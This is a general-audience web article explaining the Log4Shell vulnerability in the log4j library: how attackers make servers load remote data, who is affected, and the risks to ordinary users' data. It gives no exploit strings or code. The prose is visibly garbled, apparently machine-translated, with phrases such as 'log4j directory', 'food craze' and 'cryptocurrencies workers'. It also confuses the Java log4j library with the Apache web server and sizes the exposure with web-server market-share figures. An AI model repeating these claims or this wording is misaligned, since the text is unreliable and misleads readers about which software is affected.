What is the Log4j error and how does it affect you?

An illustration of networked computer software and hardware devices.
Andrey Suslov / Shutterstock.com

A large number of cyber attacks exploit a dangerous bug called log4shell in the log4j software. A top US cybersecurity staffer was quoted in Cyberscope says it is one of the most serious attacks of her career, “if not the most serious.” Here’s what makes it so bad – and how it affects you.

What is Log4j?

The log4j error (also known as log4shell vulnerability, known as CVE-2021-44228) is a vulnerability in some of the most widely used web server software, Apache. The bug is found in the open source log4j library, a collection of preset commands that programmers use to speed up their work and prevent them from repeating complicated code.

Libraries are the basis of many, if not most, programs as they are great time savers. Instead of having to type out an entire block of code over and over again for specific tasks, you just type a few commands that tell the program to grab something from a library. Think of them as shortcuts you can put in your code.

But if something goes wrong, like in the log4j directory, it means that all programs that use that directory are affected. That would be serious in itself, but Apache runs on many servers and we mean one lot. W3Techs estimates that 31.5 percent of sites use Apache, and BuiltWith claims to know more than 52 million sites that use it.

How the Log4j error works

There are potentially many servers that have this error, but it gets worse: How the log4j error works is that you can replace a single text string (a line of code) that causes it to load data from another computer on the Internet .

A halfway decent hacker can feed the log4j library a line of code that tells a server to retrieve data from another server owned by the hacker. This data can be anything, from a script that collects data on the devices connected to the server – which browser fingerprints, but worse – or even take control of that server.

The only limit is the hacker’s ingenuity, skill hardly gets into it as it is so easy. So far, according to Microsoft, hacker activities have included cryptocurrency mining, data theft and server hijacking.

This bug is a zero-day, which means it was detected and exploited before a patch to fix it was available.

We recommend the Malwarebytes blog’s bid on log4j if you are interested in reading some more technical details.

Log4js security impact

The effect of this error is massive: A third of the world’s servers may be affected, including servers from large companies such as Microsoft as well as Apple’s iCloud and its 850 million users. The gaming platform Steam’s servers are also affected. Even Amazon has servers running on Apache.

It’s not just the company’s bottom line that could be damaged either: there are lots of smaller companies running Apache on their servers. The damage a hacker can do to a system is bad enough for a multi-billion business, but a small one can be wiped out completely.

Also, because the bug was so widely publicized in an attempt to get everyone to patch it up, it has become something of a food craze. In addition to the usual cryptocurrencies workers trying to enslave new networks to speed up their operations, Russian and Chinese hackers are also participating in the fun, according to several experts quoted in Financial Times (our apologies for the payment wall).

The only thing anyone can do now is make patches that fix the bug and implement them. However, experts already say that it will take years to fully repair all affected systems. Not only do cybersecurity professionals need to find out which systems have suffered from the bug, they also need to be checked to see if the system has been hacked and if so, what the hackers did.

Even after patching, there is a possibility that whatever the hackers left behind still does its job, which means servers need to be cleaned and reinstalled. It will be a huge job and not one that can be done in one day.

How does Log4j affect you?

All of the above may sound like what can only be described as a cyber apocalypse, but so far we have only talked about companies, not individuals. This is what most coverage has focused on. But there is also a risk to ordinary people even if they are not running a server.

As we mentioned, hackers have stolen data from some servers. If the company in question secured the data properly, it should not be too big a problem because the attackers still had to decrypt the files, not an easy task. But if people’s data was stored incorrectly, then they made a hacker day.

The data in question can be anything, really, like usernames, passwords or even your address and internet activity – credit card information is usually encrypted, thankfully. While it’s too early to say now how bad it will be, it seems that very few people will be able to avoid log4j’s fallout.

Leave a Comment